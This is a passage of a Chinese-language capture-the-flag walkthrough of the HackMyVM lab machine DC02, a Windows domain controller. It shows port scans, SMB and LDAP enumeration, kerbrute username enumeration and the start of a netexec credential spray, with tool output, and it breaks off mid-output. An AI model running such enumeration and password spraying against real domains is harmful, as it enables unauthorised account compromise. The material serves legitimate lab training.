{"id":863,"date":"2025-06-13T01:23:05","date_gmt":"2025-06-12T17:23:05","guid":{"rendered":"http:\/\/162.14.82.114\/?p=863"},"modified":"2025-06-13T01:23:05","modified_gmt":"2025-06-12T17:23:05","slug":"hmv-_-dc02","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/863\/06\/13\/2025\/","title":{"rendered":"hmv[-_-]DC02"},"content":{"rendered":"<h1>DC02<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122420.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122420.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250610235430296\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e00\u6253\u5f00\u5c31\u662f\u4e00\u4e2a\u4e0b\u9a6c\u5a01\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122423.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122423.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612152532263\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c06\u540d\u5b57\u4fee\u6539\u4e00\u4e0b\u5c31\u884c\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122424.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122424.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612152610622\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u968f\u4fbf\u4fee\u6539\u5565\u90fd\u884c\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122425.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506130122425.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612152735198\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p><strong>\uff01\uff01\uff01\uff01\uff01\u8be5\u5427\u5527\u591a\u6b21\u81ea\u5df1\u5173\u673a\uff0c\u4e2d\u9014\u5982\u679c\u547d\u4ee4\u8fd0\u884c\u4e0d\u51fa\u8bb0\u5f97\u67e5\u770b\u9776\u673a\u662f\u5426\u5173\u673a\u4e86\uff01\uff01\uff01\uff01\uff01<\/strong><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.101:88\nOpen 192.168.10.101:53\nOpen 192.168.10.101:135\nOpen 192.168.10.101:139\nOpen 192.168.10.101:389\nOpen 192.168.10.101:445\nOpen 192.168.10.101:464\nOpen 192.168.10.101:593\nOpen 192.168.10.101:636\nOpen 192.168.10.101:3268\nOpen 192.168.10.101:5985\nOpen 192.168.10.101:9389\nOpen 192.168.10.101:49664\nOpen 192.168.10.101:49668\nOpen 192.168.10.101:49672\nOpen 192.168.10.101:49685\nOpen 192.168.10.101:49693\n\nPORT      STATE SERVICE       REASON          VERSION\n53\/tcp    open  domain        syn-ack ttl 128 Simple DNS Plus\n88\/tcp    open  kerberos-sec  syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2025-06-12 22:31:14Z)\n135\/tcp   open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds? syn-ack ttl 128\n464\/tcp   open  kpasswd5?     syn-ack ttl 128\n593\/tcp   open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped    syn-ack ttl 128\n3268\/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n5985\/tcp  open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n9389\/tcp  open  mc-nmf        syn-ack ttl 128 .NET Message Framing\n49664\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49668\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49672\/tcp open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n49685\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\n49693\/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:65:C6:82 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 16534\/tcp): CLEAN (Timeout)\n|   Check 2 (port 48975\/tcp): CLEAN (Timeout)\n|   Check 3 (port 19523\/udp): CLEAN (Timeout)\n|   Check 4 (port 55768\/udp): CLEAN (Timeout)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: 14h59m58s\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n| smb2-time: \n|   date: 2025-06-12T22:32:02\n|_  start_date: N\/A\n| nbstat: NetBIOS name: DC01, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:65:c6:82 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n|   SOUPEDECODE&lt;1c&gt;      Flags: &lt;group&gt;&lt;active&gt;\n|   DC01&lt;00&gt;             Flags: &lt;unique&gt;&lt;active&gt;\n|   SOUPEDECODE&lt;00&gt;      Flags: &lt;group&gt;&lt;active&gt;\n|   DC01&lt;20&gt;             Flags: &lt;unique&gt;&lt;active&gt;\n|   SOUPEDECODE&lt;1b&gt;      Flags: &lt;unique&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:65:c6:82:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u654f\u611f\u670d\u52a1\u63a2\u6d4b<\/h3>\n<h4>SMB\u670d\u52a1<\/h4>\n<p>\u53d1\u73b0\u5f00\u653e\u4e86<code>445<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb 192.168.10.101 -u &quot;&quot; -p &quot;&quot; --shares           \nSMB         192.168.10.101  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\: STATUS_ACCESS_DENIED \nSMB         192.168.10.101  445    DC01             [-] Error enumerating shares: Error occurs while reading from remote(104)<\/code><\/pre>\n<p>\u53d1\u73b0\u57df\u540d\u89e3\u6790\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6dfb\u52a0\uff1a<\/p>\n<pre><code class=\"language-bash\">192.168.10.101  SOUPEDECODE.LOCAL<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ enum4linux -a $IP\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Thu Jun 12 03:42:45 2025\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.101\nRID Range ........ 500-550,1000-1050\nUsername ......... &#039;&#039;\nPassword ......... &#039;&#039;\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.101 )===========================\n\n[+] Got domain\/workgroup name: SOUPEDECODE\n\n ===============================( Nbtstat Information for 192.168.10.101 )===============================\n\nLooking up status of 192.168.10.101\n        SOUPEDECODE     &lt;1c&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain Controllers\n        DC01            &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service\n        SOUPEDECODE     &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain\/Workgroup Name\n        DC01            &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service\n        SOUPEDECODE     &lt;1b&gt; -         B &lt;ACTIVE&gt;  Domain Master Browser\n\n        MAC Address = 08-00-27-65-C6-82\n\n ==================================( Session Check on 192.168.10.101 )==================================\n\n[E] Server doesn&#039;t allow session using username &#039;&#039;, password &#039;&#039;.  Aborting remainder of tests.<\/code><\/pre>\n<p>\u53d1\u73b0\u5b58\u5728\u597d\u51e0\u4e2a\u6587\u4ef6\u7cfb\u7edf\uff0c\u4f46\u662f\u54b1\u4eec\u5565\u90fd\u6ca1\u6709\uff0c\u770b\u770b\u522b\u7684\u5427\u3002<\/p>\n<h4>LDAP\u670d\u52a1<\/h4>\n<p>\u5f00\u542f\u4e86<code>389<\/code>\u548c<code>636<\/code>\u7aef\u53e3<\/p>\n<blockquote>\n<p>\u53c2\u8003 <a href=\"https:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/pentesting-ldap.html\">https:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/pentesting-ldap.html<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ nmap -n -sV --script &quot;ldap* and not brute&quot; $IP                              \n\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-12 03:52 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.00086s latency).\nNot shown: 988 filtered tcp ports (no-response)\nPORT     STATE SERVICE       VERSION\n53\/tcp   open  domain        Simple DNS Plus\n88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-12 22:52:30Z)\n135\/tcp  open  msrpc         Microsoft Windows RPC\n139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n|   &lt;ROOT&gt;\n|       domainFunctionality: 7\n|       forestFunctionality: 7\n|       domainControllerFunctionality: 7\n|       rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n|       isGlobalCatalogReady: TRUE\n|       supportedSASLMechanisms: GSSAPI\n|       supportedSASLMechanisms: GSS-SPNEGO\n|       supportedSASLMechanisms: EXTERNAL\n|       supportedSASLMechanisms: DIGEST-MD5\n|       supportedLDAPVersion: 3\n|       supportedLDAPVersion: 2\n|       supportedLDAPPolicies: MaxPoolThreads\n|       supportedLDAPPolicies: MaxPercentDirSyncRequests\n|       supportedLDAPPolicies: MaxDatagramRecv\n|       supportedLDAPPolicies: MaxReceiveBuffer\n|       supportedLDAPPolicies: InitRecvTimeout\n|       supportedLDAPPolicies: MaxConnections\n|       supportedLDAPPolicies: MaxConnIdleTime\n|       supportedLDAPPolicies: MaxPageSize\n|       supportedLDAPPolicies: MaxBatchReturnMessages\n|       supportedLDAPPolicies: MaxQueryDuration\n|       supportedLDAPPolicies: MaxDirSyncDuration\n|       supportedLDAPPolicies: MaxTempTableSize\n|       supportedLDAPPolicies: MaxResultSetSize\n|       supportedLDAPPolicies: MinResultSets\n|       supportedLDAPPolicies: MaxResultSetsPerConn\n|       supportedLDAPPolicies: MaxNotificationPerConn\n|       supportedLDAPPolicies: MaxValRange\n|       supportedLDAPPolicies: MaxValRangeTransitive\n|       supportedLDAPPolicies: ThreadMemoryLimit\n|       supportedLDAPPolicies: SystemMemoryLimitPercent\n|       supportedControl: 1.2.840.113556.1.4.319\n|       supportedControl: 1.2.840.113556.1.4.801\n|       supportedControl: 1.2.840.113556.1.4.473\n|       supportedControl: 1.2.840.113556.1.4.528\n|       supportedControl: 1.2.840.113556.1.4.417\n|       supportedControl: 1.2.840.113556.1.4.619\n|       supportedControl: 1.2.840.113556.1.4.841\n|       supportedControl: 1.2.840.113556.1.4.529\n|       supportedControl: 1.2.840.113556.1.4.805\n|       supportedControl: 1.2.840.113556.1.4.521\n|       supportedControl: 1.2.840.113556.1.4.970\n|       supportedControl: 1.2.840.113556.1.4.1338\n|       supportedControl: 1.2.840.113556.1.4.474\n|       supportedControl: 1.2.840.113556.1.4.1339\n|       supportedControl: 1.2.840.113556.1.4.1340\n|       supportedControl: 1.2.840.113556.1.4.1413\n|       supportedControl: 2.16.840.1.113730.3.4.9\n|       supportedControl: 2.16.840.1.113730.3.4.10\n|       supportedControl: 1.2.840.113556.1.4.1504\n|       supportedControl: 1.2.840.113556.1.4.1852\n|       supportedControl: 1.2.840.113556.1.4.802\n|       supportedControl: 1.2.840.113556.1.4.1907\n|       supportedControl: 1.2.840.113556.1.4.1948\n|       supportedControl: 1.2.840.113556.1.4.1974\n|       supportedControl: 1.2.840.113556.1.4.1341\n|       supportedControl: 1.2.840.113556.1.4.2026\n|       supportedControl: 1.2.840.113556.1.4.2064\n|       supportedControl: 1.2.840.113556.1.4.2065\n|       supportedControl: 1.2.840.113556.1.4.2066\n|       supportedControl: 1.2.840.113556.1.4.2090\n|       supportedControl: 1.2.840.113556.1.4.2205\n|       supportedControl: 1.2.840.113556.1.4.2204\n|       supportedControl: 1.2.840.113556.1.4.2206\n|       supportedControl: 1.2.840.113556.1.4.2211\n|       supportedControl: 1.2.840.113556.1.4.2239\n|       supportedControl: 1.2.840.113556.1.4.2255\n|       supportedControl: 1.2.840.113556.1.4.2256\n|       supportedControl: 1.2.840.113556.1.4.2309\n|       supportedControl: 1.2.840.113556.1.4.2330\n|       supportedControl: 1.2.840.113556.1.4.2354\n|       supportedCapabilities: 1.2.840.113556.1.4.800\n|       supportedCapabilities: 1.2.840.113556.1.4.1670\n|       supportedCapabilities: 1.2.840.113556.1.4.1791\n|       supportedCapabilities: 1.2.840.113556.1.4.1935\n|       supportedCapabilities: 1.2.840.113556.1.4.2080\n|       supportedCapabilities: 1.2.840.113556.1.4.2237\n|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       isSynchronized: TRUE\n|       highestCommittedUSN: 49180\n|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       dnsHostName: DC01.SOUPEDECODE.LOCAL\n|       defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       currentTime: 20250612225230.0Z\n|_      configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n445\/tcp  open  microsoft-ds?\n464\/tcp  open  kpasswd5?\n593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp  open  tcpwrapped\n3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n|   &lt;ROOT&gt;\n|       domainFunctionality: 7\n|       forestFunctionality: 7\n|       domainControllerFunctionality: 7\n|       rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n|       isGlobalCatalogReady: TRUE\n|       supportedSASLMechanisms: GSSAPI\n|       supportedSASLMechanisms: GSS-SPNEGO\n|       supportedSASLMechanisms: EXTERNAL\n|       supportedSASLMechanisms: DIGEST-MD5\n|       supportedLDAPVersion: 3\n|       supportedLDAPVersion: 2\n|       supportedLDAPPolicies: MaxPoolThreads\n|       supportedLDAPPolicies: MaxPercentDirSyncRequests\n|       supportedLDAPPolicies: MaxDatagramRecv\n|       supportedLDAPPolicies: MaxReceiveBuffer\n|       supportedLDAPPolicies: InitRecvTimeout\n|       supportedLDAPPolicies: MaxConnections\n|       supportedLDAPPolicies: MaxConnIdleTime\n|       supportedLDAPPolicies: MaxPageSize\n|       supportedLDAPPolicies: MaxBatchReturnMessages\n|       supportedLDAPPolicies: MaxQueryDuration\n|       supportedLDAPPolicies: MaxDirSyncDuration\n|       supportedLDAPPolicies: MaxTempTableSize\n|       supportedLDAPPolicies: MaxResultSetSize\n|       supportedLDAPPolicies: MinResultSets\n|       supportedLDAPPolicies: MaxResultSetsPerConn\n|       supportedLDAPPolicies: MaxNotificationPerConn\n|       supportedLDAPPolicies: MaxValRange\n|       supportedLDAPPolicies: MaxValRangeTransitive\n|       supportedLDAPPolicies: ThreadMemoryLimit\n|       supportedLDAPPolicies: SystemMemoryLimitPercent\n|       supportedControl: 1.2.840.113556.1.4.319\n|       supportedControl: 1.2.840.113556.1.4.801\n|       supportedControl: 1.2.840.113556.1.4.473\n|       supportedControl: 1.2.840.113556.1.4.528\n|       supportedControl: 1.2.840.113556.1.4.417\n|       supportedControl: 1.2.840.113556.1.4.619\n|       supportedControl: 1.2.840.113556.1.4.841\n|       supportedControl: 1.2.840.113556.1.4.529\n|       supportedControl: 1.2.840.113556.1.4.805\n|       supportedControl: 1.2.840.113556.1.4.521\n|       supportedControl: 1.2.840.113556.1.4.970\n|       supportedControl: 1.2.840.113556.1.4.1338\n|       supportedControl: 1.2.840.113556.1.4.474\n|       supportedControl: 1.2.840.113556.1.4.1339\n|       supportedControl: 1.2.840.113556.1.4.1340\n|       supportedControl: 1.2.840.113556.1.4.1413\n|       supportedControl: 2.16.840.1.113730.3.4.9\n|       supportedControl: 2.16.840.1.113730.3.4.10\n|       supportedControl: 1.2.840.113556.1.4.1504\n|       supportedControl: 1.2.840.113556.1.4.1852\n|       supportedControl: 1.2.840.113556.1.4.802\n|       supportedControl: 1.2.840.113556.1.4.1907\n|       supportedControl: 1.2.840.113556.1.4.1948\n|       supportedControl: 1.2.840.113556.1.4.1974\n|       supportedControl: 1.2.840.113556.1.4.1341\n|       supportedControl: 1.2.840.113556.1.4.2026\n|       supportedControl: 1.2.840.113556.1.4.2064\n|       supportedControl: 1.2.840.113556.1.4.2065\n|       supportedControl: 1.2.840.113556.1.4.2066\n|       supportedControl: 1.2.840.113556.1.4.2090\n|       supportedControl: 1.2.840.113556.1.4.2205\n|       supportedControl: 1.2.840.113556.1.4.2204\n|       supportedControl: 1.2.840.113556.1.4.2206\n|       supportedControl: 1.2.840.113556.1.4.2211\n|       supportedControl: 1.2.840.113556.1.4.2239\n|       supportedControl: 1.2.840.113556.1.4.2255\n|       supportedControl: 1.2.840.113556.1.4.2256\n|       supportedControl: 1.2.840.113556.1.4.2309\n|       supportedControl: 1.2.840.113556.1.4.2330\n|       supportedControl: 1.2.840.113556.1.4.2354\n|       supportedCapabilities: 1.2.840.113556.1.4.800\n|       supportedCapabilities: 1.2.840.113556.1.4.1670\n|       supportedCapabilities: 1.2.840.113556.1.4.1791\n|       supportedCapabilities: 1.2.840.113556.1.4.1935\n|       supportedCapabilities: 1.2.840.113556.1.4.2080\n|       supportedCapabilities: 1.2.840.113556.1.4.2237\n|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n|       isSynchronized: TRUE\n|       highestCommittedUSN: 49180\n|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n|       dnsHostName: DC01.SOUPEDECODE.LOCAL\n|       defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n|       currentTime: 20250612225230.0Z\n|_      configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n3269\/tcp open  tcpwrapped\n5985\/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\nMAC Address: 08:00:27:65:C6:82 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.05 seconds<\/code><\/pre>\n<p>\u53c8\u53d1\u73b0\u4e86\u4e00\u5904\u57df\u540d\u89e3\u6790\uff1a<\/p>\n<pre><code class=\"language-bash\">192.168.10.101    DC01.SOUPEDECODE.LOCAL<\/code><\/pre>\n<h4>kerbrute \u7206\u7834<\/h4>\n<blockquote>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/index.html?highlight=kerbrute#user-enumeration\">https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/index.html?highlight=kerbrute#user-enumeration<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ nmap -p 88 --script=krb5-enum-users --script-args=&quot;krb5-enum-users.realm=&#039;SOUPEDECODE.LOCAL&#039;&quot; $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-12 04:06 EDT\nNmap scan report for SOUPEDECODE.LOCAL (192.168.10.101)\nHost is up (0.00066s latency).\n\nPORT   STATE SERVICE\n88\/tcp open  kerberos-sec\n| krb5-enum-users: \n| Discovered Kerberos principals\n|     admin@SOUPEDECODE.LOCAL\n|_    administrator@SOUPEDECODE.LOCAL\nMAC Address: 08:00:27:65:C6:82 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.63 seconds<\/code><\/pre>\n<p>\u5c1d\u8bd5\u6307\u5b9a\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff0c\u7528\u5230\u4e86\u5de5\u5177\uff1a<a href=\"https:\/\/github.com\/ropnop\/kerbrute\/releases\">https:\/\/github.com\/ropnop\/kerbrute\/releases<\/a><\/p>\n<pre><code>\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ .\/kerbrute_linux_amd64 userenum -d SOUPEDECODE.LOCAL --dc 192.168.10.101 \/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt -t 50\n\n    __             __               __     \n   \/ \/_____  _____\/ \/_  _______  __\/ \/____ \n  \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,&lt; \/  __\/ \/  \/ \/_\/ \/ \/  \/ \/_\/ \/ \/_\/  __\/\n\/_\/|_|\\___\/_\/  \/_.___\/_\/   \\__,_\/\\__\/\\___\/                                        \n\nVersion: v1.0.3 (9dad6e1) - 06\/12\/25 - Ronnie Flathers @ropnop\n\n2025\/06\/12 04:51:39 &gt;  Using KDC(s):\n2025\/06\/12 04:51:39 &gt;   192.168.10.101:88\n\n2025\/06\/12 04:51:39 &gt;  [+] VALID USERNAME:       admin@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:39 &gt;  [+] VALID USERNAME:       charlie@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:40 &gt;  [+] VALID USERNAME:       Charlie@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:40 &gt;  [+] VALID USERNAME:       administrator@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:40 &gt;  [+] VALID USERNAME:       Admin@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:51 &gt;  [+] VALID USERNAME:       Administrator@SOUPEDECODE.LOCAL\n2025\/06\/12 04:51:52 &gt;  [+] VALID USERNAME:       CHARLIE@SOUPEDECODE.LOCAL\n2025\/06\/12 04:52:47 &gt;  [+] VALID USERNAME:       ADMIN@SOUPEDECODE.LOCAL\n2025\/06\/12 05:04:51 &gt;  [+] VALID USERNAME:       wreed11@SOUPEDECODE.LOCAL\n^C<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u6709\u54ea\u4e9b\u51ed\u8bc1\u53ef\u4ee5\u7206\u7834\u51fa\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-bash\">admin\ncharlie\nadministrator\nwreed11<\/code><\/pre>\n<p>\u5c1d\u8bd5\u679a\u4e3e\u53d1\u73b0\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb SOUPEDECODE.LOCAL -u dict -p dict --continue-on-success\nSMB         192.168.10.101  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.101  445    DC01             [-] 